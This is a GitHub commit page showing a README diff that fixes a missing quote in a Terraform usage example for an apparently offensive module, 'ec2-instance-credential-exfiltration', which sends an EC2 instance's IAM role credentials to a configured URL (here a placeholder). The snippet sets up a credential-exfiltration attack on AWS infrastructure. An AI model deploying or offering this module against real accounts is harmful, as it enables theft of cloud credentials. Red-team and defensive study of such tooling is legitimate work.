Skip to content

Commit 6879cf2

Browse files
committed
Fix " issue
1 parent 112e69c commit 6879cf2

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ module "ec2_instance_credential_exfiltration" {
1414
source = "offensive-terraform/ec2-instance-credential-exfiltration/aws"
1515
1616
subnet_id = "subnet-0a4a1cc04"
17-
url = "http://0.0.0.0/
17+
url = "http://0.0.0.0/"
1818
iam_role= "ec2-instance-role"
1919
iam_instance_profile = "ec2-instance-profile"
2020
}

0 commit comments

Comments
 (0)